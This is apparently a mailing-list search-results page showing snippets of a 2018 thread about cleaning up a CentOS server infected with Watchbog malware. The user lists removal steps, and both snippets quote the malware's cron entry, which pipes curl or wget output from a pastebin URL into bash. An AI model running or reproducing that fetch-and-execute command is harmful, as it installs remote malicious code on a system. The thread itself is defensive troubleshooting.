Displaying 2 results from an estimated 2 matches for "areransomwar".
Did you mean:
areransomware
2018 Dec 18
1
CentOS 7.5 Linux box got infected with Watchbog malware
...;kaushalshriyan at gmail.com> wrote:
>>>
>>>
>>> Is there a way to find out how the CentOS 7.5 Linux box got infected
>>> with malware? Currently i am referring to
>>> http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malw
>>> areransomware.html to carry out the below steps and is done manually.
>>>
>>> 1)rm -fr /tmp/*timesyncc.service*
>>> 2)crontab -e -u apigee
>>> delete the cron entry */1 * * * * (curl -fsSL
>>> https://pastebin.com/raw/aGTSGJJp||wget -q -O-
>>> https://pasteb...
2018 Dec 15
7
CentOS 7.5 Linux box got infected with Watchbog malware
Hi,
Is there a way to find out how the CentOS 7.5 Linux box got infected with
malware?
Currently i am referring to
http://sudhakarbellamkonda.blogspot.com/2018/11/blocking-watchbog-malwareransomware.html
to carry out the below steps and is done manually.
1)rm -fr /tmp/*timesyncc.service*
2)crontab -e -u apigee
delete the cron entry
*/1 * * * * (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O-
https://pastebin.com/raw/aGTSGJJp)|bash > /dev/null 2>&1
3)ps aux | grep watchbog...